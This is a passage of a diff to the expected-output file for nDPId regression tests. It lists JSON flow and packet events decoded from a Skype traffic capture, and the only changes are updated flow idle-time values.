00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABK65gAAEARC5fAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKt0gAAEARP+fAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKslEAAEARRN7AqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -960,12 +960,12 @@ 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1+UAAEARH0rAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK050AAEARI5LAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431969722958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969722958,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMbpAAEAGam7AqAEi1KEIJMPSNFCRDXDAAAAAALAC\/\/+cTwAAAgQFtAEDAwUBAQgKPiPECQAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431969722958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969722958,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMbpAAEAGam7AqAEi1KEIJMPSNFCRDXDAAAAAALAC\/\/+cTwAAAgQFtAEDAwUBAQgKPiPECQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431969723014,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969723014,"pkt":"0NQSxnP1PBXCt3IOCABFAABAmT0AAEARXfzAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431969723014,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969723014,"pkt":"0NQSxnP1PBXCt3IOCABFAABAj1YAAEARZ+PAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2291,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1431969723031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969723031,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9LBK81pkQ1wwaASOJBYJAAAAgQFrAQCCAo\/mk5jPiPECQEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2292,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1431969723031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969723031,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04iJAAEAGuhHAqAEi1KEIJMPSNFCRDXDBwSvNaoAQECyvBQAAAQEICj4jxFI\/mk5j"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2291,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1431969723031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969723031,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9LBK81pkQ1wwaASOJBYJAAAAgQFrAQCCAo\/mk5jPiPECQEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2292,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1431969723031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969723031,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04iJAAEAGuhHAqAEi1KEIJMPSNFCRDXDBwSvNaoAQECyvBQAAAQEICj4jxFI\/mk5j"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2313,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQpkAAEARjprAqAEisBo3pzLd+R0AGtW0noACYJ7Q\/f1BEkFMtKs2xKkA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2314,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAujeYAAEARD0nAqAEiTLnPDDLdsbUAGk80noICQMd2CkIbTJvr2m+0rjWR"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -976,22 +976,22 @@ 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyr4AAEARLHvAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAk9AAAEARY2nAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1431969724570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724570,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJs1AAEAGdVvAqAEi1KEIJMPTNFCYsmkqAAAAALAC\/\/+V\/gAAAgQFtAEDAwUBAQgKPiPKSgAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1431969724644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969724644,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9NEN1OLmLJpK6ASOJD4ewAAAgQFrAQCCAo\/mJ6PPiPKSgEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2331,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1431969724644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969724644,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kBRAAEAGDCDAqAEi1KEIJMPTNFCYsmkrRDdTjIAQECxPXAAAAQEICj4jypQ\/mJ6P"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1431969724570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724570,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJs1AAEAGdVvAqAEi1KEIJMPTNFCYsmkqAAAAALAC\/\/+V\/gAAAgQFtAEDAwUBAQgKPiPKSgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1431969724644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969724644,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9NEN1OLmLJpK6ASOJD4ewAAAgQFrAQCCAo\/mJ6PPiPKSgEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2331,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1431969724644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969724644,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kBRAAEAGDCDAqAEi1KEIJMPTNFCYsmkrRDdTjIAQECxPXAAAAQEICj4jypQ\/mJ6P"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLrvwAAEARSDLAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLUrMAAEARpHvAqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969725833,"flow_last_seen":1431969725833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969725833,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1431969725833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969725833,"pkt":"0NQSxnP1PBXCt3IOCABFAABANR9AAEAGjrLAqAEilQ0gD8PUNFDIS2mSAAAAALAC\/\/+IvwAAAgQFtAEDAwUBAQgKPiPPMAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2365,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1431969725886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969725886,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9RkpUGCyEtpk6ASOJCS6wAAAgQFrAQCCAo\/guiRPiPPMAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2366,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1431969725886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969725886,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FRFAAEAGrszAqAEilQ0gD8PUNFDIS2mTZKVBg4AQECzp4QAAAQEICj4jz2Q\/guiR"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969725833,"flow_last_seen":1431969725833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969725833,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1431969725833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969725833,"pkt":"0NQSxnP1PBXCt3IOCABFAABANR9AAEAGjrLAqAEilQ0gD8PUNFDIS2mSAAAAALAC\/\/+IvwAAAgQFtAEDAwUBAQgKPiPPMAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2365,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1431969725886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969725886,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9RkpUGCyEtpk6ASOJCS6wAAAgQFrAQCCAo\/guiRPiPPMAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2366,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1431969725886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969725886,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FRFAAEAGrszAqAEilQ0gD8PUNFDIS2mTZKVBg4AQECzp4QAAAQEICj4jz2Q\/guiR"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLBEcAAEAR8ufAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 